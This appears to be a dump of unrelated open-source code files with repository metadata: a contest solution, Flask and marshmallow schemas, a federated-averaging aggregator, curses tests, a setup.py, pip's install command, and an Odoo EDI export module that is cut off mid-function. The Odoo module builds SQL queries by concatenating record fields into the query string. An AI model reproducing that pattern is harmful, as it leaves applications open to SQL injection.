f3e5e38c5215f19579bb0422f303a9c18c626afa
|
[
"Apache-2.0"
] | 2
|
2020-01-29T06:54:41.000Z
|
2021-11-07T13:23:27.000Z
|
BOJ/05000~05999/5000~5099/5046.py
|
shinkeonkim/Today_PS
|
bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44
|
[
"Apache-2.0"
] | null | null | null |
BOJ/05000~05999/5000~5099/5046.py
|
shinkeonkim/Today_PS
|
bb0cda0ee1b9c57e1cfa38355e29d0f1c6167a44
|
[
"Apache-2.0"
] | null | null | null |
N,B,H,W =map(int,input().split())
ans = 9876543210
for i in range(H):
p = int(input())
L = list(map(int,input().split()))
for i in L:
if i >=N:
if p*N <= B and p*N < ans:
ans = p*N
if ans == 9876543210:
print("stay home")
else:
print(ans)
| 22.615385
| 38
| 0.489796
|
794fcf0ec29ca239aa9d110da4827fe2cc52b65c
| 507
|
py
|
Python
|
flask_request_logger/schemas.py
|
passiomatic/flask-request-logger
|
bbace0a0c3ba80b87bd03f53fcec290ba7ded9aa
|
[
"MIT"
] | 5
|
2018-10-26T09:49:40.000Z
|
2022-01-13T06:40:06.000Z
|
flask_request_logger/schemas.py
|
passiomatic/flask-request-logger
|
bbace0a0c3ba80b87bd03f53fcec290ba7ded9aa
|
[
"MIT"
] | 1
|
2019-08-20T02:40:02.000Z
|
2019-08-20T02:40:02.000Z
|
flask_request_logger/schemas.py
|
passiomatic/flask-request-logger
|
bbace0a0c3ba80b87bd03f53fcec290ba7ded9aa
|
[
"MIT"
] | 4
|
2019-08-17T16:48:26.000Z
|
2021-05-25T12:02:17.000Z
|
from marshmallow import fields, Schema
from marshmallow_sqlalchemy import ModelSchema
from flask_request_logger.models import RequestLog, ResponseLog
class RequestLogSchema(ModelSchema):
class Meta:
model = RequestLog
exclude = ('response_log', )
class ResponseLogSchema(ModelSchema):
class Meta:
model = ResponseLog
exclude = ('request', )
class LogSchema(Schema):
request = fields.Nested(RequestLogSchema)
response = fields.Nested(ResponseLogSchema)
| 23.045455
| 63
| 0.733728
|
794fcf1061ffc8027cc181bac23b01bad5cb3077
| 2,063
|
py
|
Python
|
demos/HFL/algorithm/fed_avg.py
|
monadyn/fedlearn-algo
|
c4459d421139b0bb765527d636fff123bf17bda4
|
[
"Apache-2.0"
] | 86
|
2021-07-20T01:54:21.000Z
|
2021-10-06T04:02:40.000Z
|
demos/HFL/algorithm/fed_avg.py
|
fedlearnAI/fedlearnalgo
|
63d9ceb64d331ff2b5103ae49e54229cad7e2095
|
[
"Apache-2.0"
] | 5
|
2021-07-23T21:22:16.000Z
|
2021-09-12T15:48:35.000Z
|
demos/HFL/algorithm/fed_avg.py
|
fedlearnAI/fedlearnalgo
|
63d9ceb64d331ff2b5103ae49e54229cad7e2095
|
[
"Apache-2.0"
] | 28
|
2021-07-20T07:15:33.000Z
|
2021-08-22T20:04:57.000Z
|
# Copyright 2021 Fedlearn authors.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os,sys
root_path = os.getcwd()
from typing import List,Tuple,Dict,Union
from abc import abstractmethod, ABC
sys.path.append(root_path)
sys.path.append(os.path.join(root_path,'demos/HFL'))
from demos.HFL.common.param_util import(
Params,
TrainRes
)
from demos.HFL.algorithm.base_aggregation import Aggregator
class FedAvg(Aggregator):
def aggregate(self,
trainRes_list: List[TrainRes]
)->Params:
"""
Fed Avg algorithm for HFL
Parameters
---------
trainRes_list: List[TrainRes]
A list of TrainRes, each corresponds to one client's model parameters and training metrics
Returns
-------
Params: Parameters of global model
"""
w_names = trainRes_list[0].params.names
total_samples = sum(tr.num_samples for tr in trainRes_list)
weights = [tr.num_samples/total_samples for tr in trainRes_list]
ave_params = [([w*weights[idx] for w in tr.params.weights])
for idx,tr in enumerate(trainRes_list)]
ave_params = [sum([ data[layer_idx] for data in ave_params])
for layer_idx in range(len(ave_params[0]))]
return Params(
names=w_names,
weights=ave_params,
weight_type='float')
| 31.738462
| 102
| 0.619001
|
794fd06da7b6aaac348173f372a080759b75e27c
| 3,325
|
py
|
Python
|
tests/interfaces/curses_interface/test_render.py
|
carlosmaniero/ascii-engine
|
47f6b6769a6ed5b2497330c9b5575c7cc8566544
|
[
"MIT"
] | 2
|
2018-03-02T17:02:30.000Z
|
2018-11-22T13:43:37.000Z
|
tests/interfaces/curses_interface/test_render.py
|
carlosmaniero/ascii-engine
|
47f6b6769a6ed5b2497330c9b5575c7cc8566544
|
[
"MIT"
] | 6
|
2018-04-10T03:31:44.000Z
|
2018-04-10T04:12:16.000Z
|
tests/interfaces/curses_interface/test_render.py
|
carlosmaniero/ascii-engine
|
47f6b6769a6ed5b2497330c9b5575c7cc8566544
|
[
"MIT"
] | null | null | null |
from unittest.mock import Mock
import pytest
import time
from ascii_engine.elements.styles import colorize
from tests.mocked_modules.curses import (mocked_curses, patch_curses,
setup_curses)
from ascii_engine.interfaces.curses_interface.render import CursesRender
from ascii_engine.screen import Screen
from ascii_engine.elements.text import Text
from ascii_engine.colors import RGB
DEFAULT_PAIR = 1
async def wait_for_render(curses_interface, event_loop):
await event_loop.run_in_executor(
curses_interface.render_interface.pool,
time.sleep,
0
)
@patch_curses
def test_that_interface_is_well_configured():
curses_interface = CursesRender()
assert mocked_curses.initscr.called
assert mocked_curses.start_color.called
assert mocked_curses.noecho.called
assert mocked_curses.cbreak.called
curses_interface.window.keypad.assert_called_with(True)
@pytest.mark.asyncio
async def test_that_all_pixels_are_send_to_screen(event_loop):
setup_curses()
curses_interface = CursesRender()
text_element = Text('ab\ncd')
screen = Screen(2, 2)
screen.add_element(text_element)
curses_interface.render(screen)
await wait_for_render(curses_interface, event_loop)
curses_interface.window.addstr.assert_any_call(0, 0, 'a', DEFAULT_PAIR)
curses_interface.window.addstr.assert_any_call(0, 1, 'b', DEFAULT_PAIR)
curses_interface.window.addstr.assert_any_call(1, 0, 'c', DEFAULT_PAIR)
curses_interface.window.addstr.assert_any_call(1, 1, 'd', DEFAULT_PAIR)
@patch_curses
def test_that_the_terminal_is_well_reconfigured_after_stop_call():
curses_interface = CursesRender()
curses_interface.stop()
curses_interface.window.keypad.assert_called_with(False)
assert mocked_curses.nocbreak.called
assert mocked_curses.echo.called
assert mocked_curses.endwin.called
@pytest.mark.asyncio
async def test_that_given_a_foreground_and_background_a_curses_pair_is_created(
event_loop):
setup_curses()
text_element = Text('ab\ncd')
expected_fg = RGB(0, 0, 0)
expected_bg = RGB(128, 0, 0)
expected_color_pair = 1
mocked_curses.color_pair = Mock(return_value='color_1')
text_element.set_style([
colorize(expected_fg, expected_bg)
])
screen = Screen(2, 2)
screen.add_element(text_element)
curses_interface = CursesRender()
curses_interface.render(screen)
await wait_for_render(curses_interface, event_loop)
mocked_curses.init_pair.assert_called_once_with(
expected_color_pair,
expected_fg.calculate_term_color(),
expected_bg.calculate_term_color()
)
curses_interface.window.addstr.assert_any_call(0, 0, 'a', 'color_1')
curses_interface.window.addstr.assert_any_call(0, 1, 'b', 'color_1')
curses_interface.window.addstr.assert_any_call(1, 0, 'c', 'color_1')
curses_interface.window.addstr.assert_any_call(1, 1, 'd', 'color_1')
def test_that_the_interface_returns_the_screen_with_terminal_size():
curses_interface = CursesRender()
curses_interface.window = Mock()
curses_interface.window.getmaxyx = Mock(return_value=(10, 20))
screen = curses_interface.create_empty_screen()
assert screen.get_width() == 19
assert screen.get_height() == 10
| 31.971154
| 79
| 0.754887
|
794fd3ed8006763c681b85b856f90cacab4c03be
| 1,042
|
py
|
Python
|
setup.py
|
kowaalczyk/reformer-tts
|
4d39bf0677fb34298f1bf88f17c6623d5a96de80
|
[
"MIT"
] | 6
|
2020-06-22T18:01:07.000Z
|
2021-09-22T02:46:41.000Z
|
setup.py
|
kowaalczyk/reformer-tts
|
4d39bf0677fb34298f1bf88f17c6623d5a96de80
|
[
"MIT"
] | null | null | null |
setup.py
|
kowaalczyk/reformer-tts
|
4d39bf0677fb34298f1bf88f17c6623d5a96de80
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
setup(
name="reformer_tts",
version="0.1",
packages=find_packages(include=('reformer_tts', 'reformer_tts.*')),
python_requires=">=3.8",
install_requires=[
"dacite==1.4.0",
"dvc==0.88",
"Click==7",
"pytorch-lightning==0.7.6",
"PyYAML==5.1.2",
"tqdm==4.43.0",
"beautifulsoup4==4.8.2",
"requests==2.23.0",
"reformer-pytorch==0.19.1",
"demjson==2.2.4",
"torch==1.4.0",
"torchvision==0.5.0",
"torchaudio==0.4.0",
"scipy==1.4.1",
"ffmpeg-python==0.2.0",
"matplotlib==3.1.3",
"librosa==0.7.2",
"unidecode==1.1.1",
"nltk==3.4.5",
"g2p-en==2.1.0",
"pydub==0.23.1",
"psutil==5.7.0",
"pandas==1.0.3",
"google-cloud-storage==1.28.1",
"pytest==5.4.2",
"transformers==2.11.0",
],
entry_points="""
[console_scripts]
reformercli=reformer_tts.cli:cli
""",
)
| 25.414634
| 71
| 0.485605
|
794fd4374386f93b8974b22499ebc7ea422e18d8
| 90
|
py
|
Python
|
app/__init__.py
|
gabrielx52/lineup
|
2590d29cac45d84d9d810b50cc201130238dd936
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
gabrielx52/lineup
|
2590d29cac45d84d9d810b50cc201130238dd936
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
gabrielx52/lineup
|
2590d29cac45d84d9d810b50cc201130238dd936
|
[
"MIT"
] | null | null | null |
"""Init script."""
from flask import Flask
app = Flask(__name__)
from app import routes
| 12.857143
| 23
| 0.722222
|
794fd459299266a6600a912e0418b5dfdf58d812
| 26,702
|
py
|
Python
|
vut/lib/python3.8/site-packages/pipenv/patched/notpip/_internal/commands/install.py
|
dan-mutua/djangowk1
|
1e5dcb6443ef21451e21845ec639198719e11b10
|
[
"MIT"
] | 18,636
|
2017-12-06T14:53:18.000Z
|
2022-03-31T13:12:34.000Z
|
vut/lib/python3.8/site-packages/pipenv/patched/notpip/_internal/commands/install.py
|
dan-mutua/djangowk1
|
1e5dcb6443ef21451e21845ec639198719e11b10
|
[
"MIT"
] | 3,640
|
2017-12-06T16:58:35.000Z
|
2022-03-31T22:20:57.000Z
|
vut/lib/python3.8/site-packages/pipenv/patched/notpip/_internal/commands/install.py
|
dan-mutua/djangowk1
|
1e5dcb6443ef21451e21845ec639198719e11b10
|
[
"MIT"
] | 1,987
|
2017-12-06T15:04:51.000Z
|
2022-03-26T10:05:15.000Z
|
# The following comment should be removed at some point in the future.
# It's included for now because without it InstallCommand.run() has a
# couple errors where we have to know req.name is str rather than
# Optional[str] for the InstallRequirement req.
# mypy: strict-optional=False
# mypy: disallow-untyped-defs=False
from __future__ import absolute_import
import errno
import logging
import operator
import os
import shutil
import site
from optparse import SUPPRESS_HELP
from pipenv.patched.notpip._vendor import pkg_resources
from pipenv.patched.notpip._vendor.packaging.utils import canonicalize_name
from pipenv.patched.notpip._internal.cache import WheelCache
from pipenv.patched.notpip._internal.cli import cmdoptions
from pipenv.patched.notpip._internal.cli.cmdoptions import make_target_python
from pipenv.patched.notpip._internal.cli.req_command import RequirementCommand
from pipenv.patched.notpip._internal.cli.status_codes import ERROR, SUCCESS
from pipenv.patched.notpip._internal.exceptions import (
CommandError,
InstallationError,
PreviousBuildDirError,
)
from pipenv.patched.notpip._internal.locations import distutils_scheme
from pipenv.patched.notpip._internal.operations.check import check_install_conflicts
from pipenv.patched.notpip._internal.req import RequirementSet, install_given_reqs
from pipenv.patched.notpip._internal.req.req_tracker import get_requirement_tracker
from pipenv.patched.notpip._internal.utils.deprecation import deprecated
from pipenv.patched.notpip._internal.utils.distutils_args import parse_distutils_args
from pipenv.patched.notpip._internal.utils.filesystem import test_writable_dir
from pipenv.patched.notpip._internal.utils.misc import (
ensure_dir,
get_installed_version,
protect_pip_from_modification_on_windows,
write_output,
)
from pipenv.patched.notpip._internal.utils.temp_dir import TempDirectory
from pipenv.patched.notpip._internal.utils.typing import MYPY_CHECK_RUNNING
from pipenv.patched.notpip._internal.utils.virtualenv import virtualenv_no_global
from pipenv.patched.notpip._internal.wheel_builder import build, should_build_for_install_command
if MYPY_CHECK_RUNNING:
from optparse import Values
from typing import Any, Iterable, List, Optional
from pipenv.patched.notpip._internal.models.format_control import FormatControl
from pipenv.patched.notpip._internal.req.req_install import InstallRequirement
from pipenv.patched.notpip._internal.wheel_builder import BinaryAllowedPredicate
logger = logging.getLogger(__name__)
def get_check_binary_allowed(format_control):
# type: (FormatControl) -> BinaryAllowedPredicate
def check_binary_allowed(req):
# type: (InstallRequirement) -> bool
if req.use_pep517:
return True
canonical_name = canonicalize_name(req.name)
allowed_formats = format_control.get_allowed_formats(canonical_name)
return "binary" in allowed_formats
return check_binary_allowed
class InstallCommand(RequirementCommand):
"""
Install packages from:
- PyPI (and other indexes) using requirement specifiers.
- VCS project urls.
- Local project directories.
- Local or remote source archives.
pip also supports installing from "requirements files", which provide
an easy way to specify a whole environment to be installed.
"""
usage = """
%prog [options] <requirement specifier> [package-index-options] ...
%prog [options] -r <requirements file> [package-index-options] ...
%prog [options] [-e] <vcs project url> ...
%prog [options] [-e] <local project path> ...
%prog [options] <archive url/path> ..."""
def __init__(self, *args, **kw):
super(InstallCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(cmdoptions.requirements())
cmd_opts.add_option(cmdoptions.constraints())
cmd_opts.add_option(cmdoptions.no_deps())
cmd_opts.add_option(cmdoptions.pre())
cmd_opts.add_option(cmdoptions.editable())
cmd_opts.add_option(
'-t', '--target',
dest='target_dir',
metavar='dir',
default=None,
help='Install packages into <dir>. '
'By default this will not replace existing files/folders in '
'<dir>. Use --upgrade to replace existing packages in <dir> '
'with new versions.'
)
cmdoptions.add_target_python_options(cmd_opts)
cmd_opts.add_option(
'--user',
dest='use_user_site',
action='store_true',
help="Install to the Python user install directory for your "
"platform. Typically ~/.local/, or %APPDATA%\\Python on "
"Windows. (See the Python documentation for site.USER_BASE "
"for full details.)")
cmd_opts.add_option(
'--no-user',
dest='use_user_site',
action='store_false',
help=SUPPRESS_HELP)
cmd_opts.add_option(
'--root',
dest='root_path',
metavar='dir',
default=None,
help="Install everything relative to this alternate root "
"directory.")
cmd_opts.add_option(
'--prefix',
dest='prefix_path',
metavar='dir',
default=None,
help="Installation prefix where lib, bin and other top-level "
"folders are placed")
cmd_opts.add_option(cmdoptions.build_dir())
cmd_opts.add_option(cmdoptions.src())
cmd_opts.add_option(
'-U', '--upgrade',
dest='upgrade',
action='store_true',
help='Upgrade all specified packages to the newest available '
'version. The handling of dependencies depends on the '
'upgrade-strategy used.'
)
cmd_opts.add_option(
'--upgrade-strategy',
dest='upgrade_strategy',
default='only-if-needed',
choices=['only-if-needed', 'eager'],
help='Determines how dependency upgrading should be handled '
'[default: %default]. '
'"eager" - dependencies are upgraded regardless of '
'whether the currently installed version satisfies the '
'requirements of the upgraded package(s). '
'"only-if-needed" - are upgraded only when they do not '
'satisfy the requirements of the upgraded package(s).'
)
cmd_opts.add_option(
'--force-reinstall',
dest='force_reinstall',
action='store_true',
help='Reinstall all packages even if they are already '
'up-to-date.')
cmd_opts.add_option(
'-I', '--ignore-installed',
dest='ignore_installed',
action='store_true',
help='Ignore the installed packages, overwriting them. '
'This can break your system if the existing package '
'is of a different version or was installed '
'with a different package manager!'
)
cmd_opts.add_option(cmdoptions.ignore_requires_python())
cmd_opts.add_option(cmdoptions.no_build_isolation())
cmd_opts.add_option(cmdoptions.use_pep517())
cmd_opts.add_option(cmdoptions.no_use_pep517())
cmd_opts.add_option(cmdoptions.install_options())
cmd_opts.add_option(cmdoptions.global_options())
cmd_opts.add_option(
"--compile",
action="store_true",
dest="compile",
default=True,
help="Compile Python source files to bytecode",
)
cmd_opts.add_option(
"--no-compile",
action="store_false",
dest="compile",
help="Do not compile Python source files to bytecode",
)
cmd_opts.add_option(
"--no-warn-script-location",
action="store_false",
dest="warn_script_location",
default=True,
help="Do not warn when installing scripts outside PATH",
)
cmd_opts.add_option(
"--no-warn-conflicts",
action="store_false",
dest="warn_about_conflicts",
default=True,
help="Do not warn about broken dependencies",
)
cmd_opts.add_option(cmdoptions.no_binary())
cmd_opts.add_option(cmdoptions.only_binary())
cmd_opts.add_option(cmdoptions.prefer_binary())
cmd_opts.add_option(cmdoptions.no_clean())
cmd_opts.add_option(cmdoptions.require_hashes())
cmd_opts.add_option(cmdoptions.progress_bar())
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def run(self, options, args):
# type: (Values, List[Any]) -> int
cmdoptions.check_install_build_global(options)
upgrade_strategy = "to-satisfy-only"
if options.upgrade:
upgrade_strategy = options.upgrade_strategy
cmdoptions.check_dist_restriction(options, check_target=True)
install_options = options.install_options or []
options.use_user_site = decide_user_install(
options.use_user_site,
prefix_path=options.prefix_path,
target_dir=options.target_dir,
root_path=options.root_path,
isolated_mode=options.isolated_mode,
)
target_temp_dir = None # type: Optional[TempDirectory]
target_temp_dir_path = None # type: Optional[str]
if options.target_dir:
options.ignore_installed = True
options.target_dir = os.path.abspath(options.target_dir)
if (os.path.exists(options.target_dir) and not
os.path.isdir(options.target_dir)):
raise CommandError(
"Target path exists but is not a directory, will not "
"continue."
)
# Create a target directory for using with the target option
target_temp_dir = TempDirectory(kind="target")
target_temp_dir_path = target_temp_dir.path
global_options = options.global_options or []
session = self.get_default_session(options)
target_python = make_target_python(options)
finder = self._build_package_finder(
options=options,
session=session,
target_python=target_python,
ignore_requires_python=options.ignore_requires_python,
)
build_delete = (not (options.no_clean or options.build_dir))
wheel_cache = WheelCache(options.cache_dir, options.format_control)
with get_requirement_tracker() as req_tracker, TempDirectory(
options.build_dir, delete=build_delete, kind="install"
) as directory:
requirement_set = RequirementSet(
check_supported_wheels=not options.target_dir,
)
try:
self.populate_requirement_set(
requirement_set, args, options, finder, session,
wheel_cache
)
warn_deprecated_install_options(
requirement_set, options.install_options
)
preparer = self.make_requirement_preparer(
temp_build_dir=directory,
options=options,
req_tracker=req_tracker,
session=session,
finder=finder,
use_user_site=options.use_user_site,
)
resolver = self.make_resolver(
preparer=preparer,
finder=finder,
options=options,
wheel_cache=wheel_cache,
use_user_site=options.use_user_site,
ignore_installed=options.ignore_installed,
ignore_requires_python=options.ignore_requires_python,
force_reinstall=options.force_reinstall,
upgrade_strategy=upgrade_strategy,
use_pep517=options.use_pep517,
)
self.trace_basic_info(finder)
resolver.resolve(requirement_set)
try:
pip_req = requirement_set.get_requirement("pip")
except KeyError:
modifying_pip = None
else:
# If we're not replacing an already installed pip,
# we're not modifying it.
modifying_pip = getattr(pip_req, "satisfied_by", None) is None
protect_pip_from_modification_on_windows(
modifying_pip=modifying_pip
)
check_binary_allowed = get_check_binary_allowed(
finder.format_control
)
reqs_to_build = [
r for r in requirement_set.requirements.values()
if should_build_for_install_command(
r, check_binary_allowed
)
]
_, build_failures = build(
reqs_to_build,
wheel_cache=wheel_cache,
build_options=[],
global_options=[],
)
# If we're using PEP 517, we cannot do a direct install
# so we fail here.
# We don't care about failures building legacy
# requirements, as we'll fall through to a direct
# install for those.
pep517_build_failures = [
r for r in build_failures if r.use_pep517
]
if pep517_build_failures:
raise InstallationError(
"Could not build wheels for {} which use"
" PEP 517 and cannot be installed directly".format(
", ".join(r.name for r in pep517_build_failures)))
to_install = resolver.get_installation_order(
requirement_set
)
# Consistency Checking of the package set we're installing.
should_warn_about_conflicts = (
not options.ignore_dependencies and
options.warn_about_conflicts
)
if should_warn_about_conflicts:
self._warn_about_conflicts(to_install)
# Don't warn about script install locations if
# --target has been specified
warn_script_location = options.warn_script_location
if options.target_dir:
warn_script_location = False
installed = install_given_reqs(
to_install,
install_options,
global_options,
root=options.root_path,
home=target_temp_dir_path,
prefix=options.prefix_path,
pycompile=options.compile,
warn_script_location=warn_script_location,
use_user_site=options.use_user_site,
)
lib_locations = get_lib_location_guesses(
user=options.use_user_site,
home=target_temp_dir_path,
root=options.root_path,
prefix=options.prefix_path,
isolated=options.isolated_mode,
)
working_set = pkg_resources.WorkingSet(lib_locations)
installed.sort(key=operator.attrgetter('name'))
items = []
for result in installed:
item = result.name
try:
installed_version = get_installed_version(
result.name, working_set=working_set
)
if installed_version:
item += '-' + installed_version
except Exception:
pass
items.append(item)
installed_desc = ' '.join(items)
if installed_desc:
write_output(
'Successfully installed %s', installed_desc,
)
except EnvironmentError as error:
show_traceback = (self.verbosity >= 1)
message = create_env_error_message(
error, show_traceback, options.use_user_site,
)
logger.error(message, exc_info=show_traceback)
return ERROR
except PreviousBuildDirError:
options.no_clean = True
raise
finally:
# Clean up
if not options.no_clean:
requirement_set.cleanup_files()
wheel_cache.cleanup()
if options.target_dir:
self._handle_target_dir(
options.target_dir, target_temp_dir, options.upgrade
)
return SUCCESS
def _handle_target_dir(self, target_dir, target_temp_dir, upgrade):
ensure_dir(target_dir)
# Checking both purelib and platlib directories for installed
# packages to be moved to target directory
lib_dir_list = []
with target_temp_dir:
# Checking both purelib and platlib directories for installed
# packages to be moved to target directory
scheme = distutils_scheme('', home=target_temp_dir.path)
purelib_dir = scheme['purelib']
platlib_dir = scheme['platlib']
data_dir = scheme['data']
if os.path.exists(purelib_dir):
lib_dir_list.append(purelib_dir)
if os.path.exists(platlib_dir) and platlib_dir != purelib_dir:
lib_dir_list.append(platlib_dir)
if os.path.exists(data_dir):
lib_dir_list.append(data_dir)
for lib_dir in lib_dir_list:
for item in os.listdir(lib_dir):
if lib_dir == data_dir:
ddir = os.path.join(data_dir, item)
if any(s.startswith(ddir) for s in lib_dir_list[:-1]):
continue
target_item_dir = os.path.join(target_dir, item)
if os.path.exists(target_item_dir):
if not upgrade:
logger.warning(
'Target directory %s already exists. Specify '
'--upgrade to force replacement.',
target_item_dir
)
continue
if os.path.islink(target_item_dir):
logger.warning(
'Target directory %s already exists and is '
'a link. Pip will not automatically replace '
'links, please remove if replacement is '
'desired.',
target_item_dir
)
continue
if os.path.isdir(target_item_dir):
shutil.rmtree(target_item_dir)
else:
os.remove(target_item_dir)
shutil.move(
os.path.join(lib_dir, item),
target_item_dir
)
def _warn_about_conflicts(self, to_install):
try:
package_set, _dep_info = check_install_conflicts(to_install)
except Exception:
logger.error("Error checking for conflicts.", exc_info=True)
return
missing, conflicting = _dep_info
# NOTE: There is some duplication here from pipenv.patched.notpip check
for project_name in missing:
version = package_set[project_name][0]
for dependency in missing[project_name]:
logger.critical(
"%s %s requires %s, which is not installed.",
project_name, version, dependency[1],
)
for project_name in conflicting:
version = package_set[project_name][0]
for dep_name, dep_version, req in conflicting[project_name]:
logger.critical(
"%s %s has requirement %s, but you'll have %s %s which is "
"incompatible.",
project_name, version, req, dep_name, dep_version,
)
def get_lib_location_guesses(*args, **kwargs):
scheme = distutils_scheme('', *args, **kwargs)
return [scheme['purelib'], scheme['platlib']]
def site_packages_writable(**kwargs):
return all(
test_writable_dir(d) for d in set(get_lib_location_guesses(**kwargs))
)
def decide_user_install(
use_user_site, # type: Optional[bool]
prefix_path=None, # type: Optional[str]
target_dir=None, # type: Optional[str]
root_path=None, # type: Optional[str]
isolated_mode=False, # type: bool
):
# type: (...) -> bool
"""Determine whether to do a user install based on the input options.
If use_user_site is False, no additional checks are done.
If use_user_site is True, it is checked for compatibility with other
options.
If use_user_site is None, the default behaviour depends on the environment,
which is provided by the other arguments.
"""
# In some cases (config from tox), use_user_site can be set to an integer
# rather than a bool, which 'use_user_site is False' wouldn't catch.
if (use_user_site is not None) and (not use_user_site):
logger.debug("Non-user install by explicit request")
return False
if use_user_site:
if prefix_path:
raise CommandError(
"Can not combine '--user' and '--prefix' as they imply "
"different installation locations"
)
if virtualenv_no_global():
raise InstallationError(
"Can not perform a '--user' install. User site-packages "
"are not visible in this virtualenv."
)
logger.debug("User install by explicit request")
return True
# If we are here, user installs have not been explicitly requested/avoided
assert use_user_site is None
# user install incompatible with --prefix/--target
if prefix_path or target_dir:
logger.debug("Non-user install due to --prefix or --target option")
return False
# If user installs are not enabled, choose a non-user install
if not site.ENABLE_USER_SITE:
logger.debug("Non-user install because user site-packages disabled")
return False
# If we have permission for a non-user install, do that,
# otherwise do a user install.
if site_packages_writable(root=root_path, isolated=isolated_mode):
logger.debug("Non-user install because site-packages writeable")
return False
logger.info("Defaulting to user installation because normal site-packages "
"is not writeable")
return True
def warn_deprecated_install_options(requirement_set, options):
# type: (RequirementSet, Optional[List[str]]) -> None
"""If any location-changing --install-option arguments were passed for
requirements or on the command-line, then show a deprecation warning.
"""
def format_options(option_names):
# type: (Iterable[str]) -> List[str]
return ["--{}".format(name.replace("_", "-")) for name in option_names]
requirements = (
requirement_set.unnamed_requirements +
list(requirement_set.requirements.values())
)
offenders = []
for requirement in requirements:
install_options = requirement.options.get("install_options", [])
location_options = parse_distutils_args(install_options)
if location_options:
offenders.append(
"{!r} from {}".format(
format_options(location_options.keys()), requirement
)
)
if options:
location_options = parse_distutils_args(options)
if location_options:
offenders.append(
"{!r} from command line".format(
format_options(location_options.keys())
)
)
if not offenders:
return
deprecated(
reason=(
"Location-changing options found in --install-option: {}. "
"This configuration may cause unexpected behavior and is "
"unsupported.".format(
"; ".join(offenders)
)
),
replacement=(
"using pip-level options like --user, --prefix, --root, and "
"--target"
),
gone_in="20.2",
issue=7309,
)
def create_env_error_message(error, show_traceback, using_user_site):
"""Format an error message for an EnvironmentError
It may occur anytime during the execution of the install command.
"""
parts = []
# Mention the error if we are not going to show a traceback
parts.append("Could not install packages due to an EnvironmentError")
if not show_traceback:
parts.append(": ")
parts.append(str(error))
else:
parts.append(".")
# Spilt the error indication from a helper message (if any)
parts[-1] += "\n"
# Suggest useful actions to the user:
# (1) using user site-packages or (2) verifying the permissions
if error.errno == errno.EACCES:
user_option_part = "Consider using the `--user` option"
permissions_part = "Check the permissions"
if not using_user_site:
parts.extend([
user_option_part, " or ",
permissions_part.lower(),
])
else:
parts.append(permissions_part)
parts.append(".\n")
return "".join(parts).strip() + "\n"
| 38.037037
| 97
| 0.58696
|
794fd4c2d15c3142a462c1cf48c79fa20bfb1952
| 7,576
|
py
|
Python
|
is_export_edi.py
|
tonygalmiche/is_plastigray
|
10669dda26f5a8653371a52798f41fdc805c61f2
|
[
"MIT"
] | 1
|
2018-12-29T08:34:25.000Z
|
2018-12-29T08:34:25.000Z
|
is_export_edi.py
|
tonygalmiche/is_plastigray
|
10669dda26f5a8653371a52798f41fdc805c61f2
|
[
"MIT"
] | null | null | null |
is_export_edi.py
|
tonygalmiche/is_plastigray
|
10669dda26f5a8653371a52798f41fdc805c61f2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from openerp import models,fields,api
from openerp.tools.translate import _
from openerp.exceptions import Warning
import os
# TODO :
# - Créer l'import EDI pour ce fichier (type edi = odoo)
class is_export_edi(models.Model):
_name='is.export.edi'
_order='name desc'
@api.depends('code')
def _compute(self):
for obj in self:
partner_id=False
if obj.code:
partners = self.env['res.partner'].search([('is_code','=',obj.code),('is_adr_code','=','0')])
for partner in partners:
partner_id=partner.id
obj.partner_id=partner_id
name = fields.Char("N° export", readonly=True)
code = fields.Char("Code fournisseur",required=True)
code_adr = fields.Char("Code adresse fournisseur")
partner_id = fields.Many2one('res.partner', 'Fournisseur', compute='_compute', readonly=True, store=True)
contact_id = fields.Many2one('res.partner', 'Contact Logistique')
date_fin = fields.Date("Date de fin", required=True)
historique_ids = fields.One2many('is.export.edi.histo' , 'edi_id', u"Historique")
@api.multi
def code_on_change(self,code):
cr , uid, context = self.env.args
res={}
res['value']={}
contact_id=False
if code:
partners = self.env['res.partner'].search([('is_code','=',code),('is_adr_code','=','0')])
for partner in partners:
partner_id=partner.id
#** Recherche du contact logistique ****************************
SQL="""
select rp.id, rp.is_type_contact, itc.name
from res_partner rp inner join is_type_contact itc on rp.is_type_contact=itc.id
where rp.parent_id="""+str(partner_id)+""" and itc.name ilike '%logistique%' and active='t' limit 1
"""
cr.execute(SQL)
result = cr.fetchall()
for row in result:
contact_id=row[0]
#***************************************************************
res['value']['contact_id']=contact_id
return res
@api.model
def create(self, vals):
data_obj = self.env['ir.model.data']
sequence_ids = data_obj.search([('name','=','is_export_edi_seq')])
if sequence_ids:
sequence_id = data_obj.browse(sequence_ids[0].id).res_id
vals['name'] = self.env['ir.sequence'].get_id(sequence_id, 'id')
obj = super(is_export_edi, self).create(vals)
return obj
@api.multi
def creer_fichier_edi_action(self):
cr , uid, context = self.env.args
for obj in self:
SQL="""
select
rp.is_code,
rp.is_adr_code,
f.name,
pt.is_code,
l.date,
l.type_cde,
(l.quantite-coalesce(l.quantite_rcp,0))*is_unit_coef(pt.uom_id, l.uom_id)
from is_cde_ouverte_fournisseur_line l inner join is_cde_ouverte_fournisseur_product p on l.product_id=p.id
inner join product_product pp on p.product_id=pp.id
inner join product_template pt on pp.product_tmpl_id=pt.id
inner join is_cde_ouverte_fournisseur f on p.order_id=f.id
inner join res_partner rp on f.partner_id=rp.id
where rp.is_code='"""+obj.code+"""' and l.date<='"""+obj.date_fin+"""'
"""
if obj.code_adr:
SQL=SQL+" and rp.is_adr_code='"+obj.code_adr+"' "
SQL=SQL+"order by rp.is_code, rp.is_adr_code, pt.is_code, l.date "
cr.execute(SQL)
result = cr.fetchall()
datas="";
for row in result:
